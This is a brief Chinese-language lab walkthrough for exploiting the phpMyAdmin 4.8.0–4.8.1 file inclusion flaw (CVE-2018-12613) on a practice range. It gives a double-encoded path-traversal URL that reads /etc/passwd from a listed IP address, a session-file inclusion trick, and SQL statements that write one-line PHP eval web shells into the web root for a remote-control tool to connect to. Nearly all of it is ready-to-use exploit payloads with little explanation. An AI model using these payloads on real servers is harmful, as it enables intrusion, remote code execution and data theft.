01 背景介绍
phpmyadmin 4.8.1 远程文件包含漏洞(CVE-2018-12613)
phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具。其index.php中存在一处文件包含逻辑,
通过二次编码即可绕过检查,造成远程文件包含漏洞。
02 影响版本
phpMyAdmin 4.8.0和4.8.1
03 利用方式
1.写phpinfo文件,利用文件包含,查看绝对路径,
select '<?php phpinfo()?>'
2.写小马
select '<?php @eval($_POST[a])?>' into outfile '/var/www/html/1.php'
04 靶场
1.证明漏洞
http://219.153.49.228:45973/index.php?target=db_sql.php%253f/../../../../../../etc/passwd
,证明存在文件包含
2.写phpinfo,查看绝对路径
select '<?php phpinfo()?>'
poc:
index.php?target=db_sql.php%253f/../../../../../../../../../../../tmp/sess_+之前记录的cookie
index.php?target=db_sql.php%253f/../../../../../../../../../../../tmp/sess_k07rli8m3ms5s04av4ttg9q9da227skv
在phpinfo中寻找path,找网站的绝对路径
3.写php一句木马
select '<?php @eval($_REQUEST[cmd]);?>' into outfile '/var/www/html/1.php'
连接成功,可以用菜刀连接,拿key.txt